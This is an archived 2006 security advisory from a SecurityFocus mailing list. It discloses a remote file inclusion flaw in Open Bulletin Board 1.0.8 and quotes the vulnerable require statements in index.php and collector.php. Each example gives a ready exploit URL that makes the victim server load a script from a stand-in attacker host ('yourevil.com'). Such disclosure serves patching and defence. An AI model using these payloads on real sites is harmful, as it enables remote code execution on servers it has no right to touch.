Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability Sep 10 2006 05:16PM
l0x3 hotmail com
+--------------------------------------------------------------------

+

+ Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities

+

+-------------------------------------------------------------------

+

+ Affected Software .: Software

+ Version .............: Open Bulletin Board 1.0.8

+ Venedor ...........: http://www.openbb.com

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Discovered by ..........: Eddy_BAck0o

+ Contact ...........: l0x3[at]hotmail.com

+

+--------------------------------------------------------------------

+--------------------------------------------------------------------

+ ./index Directory ...

~ [index.php]

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ require $root_path . "base.php"; <--- 30 - 380

+ require $root_path . "base.php"; <--- 46 - 380

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+ Ex -->

http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cm
d

+

+-------------------------------------------------------------------

+

~ [collector.php]

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ root_path = "./"; <--- 24 - 194

+ require $root_path . "base.php"; <--- 159 - 194

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+ Ex -->

http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cm
d

+

+-------------------------------------------------------------------

+ Greetz LEzr.com/vB Member's ; My Team ; My Best [ MoHaJaLi ; Qptan ] ;....

+--------------------------------------------------------------------

+--------------------------------------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus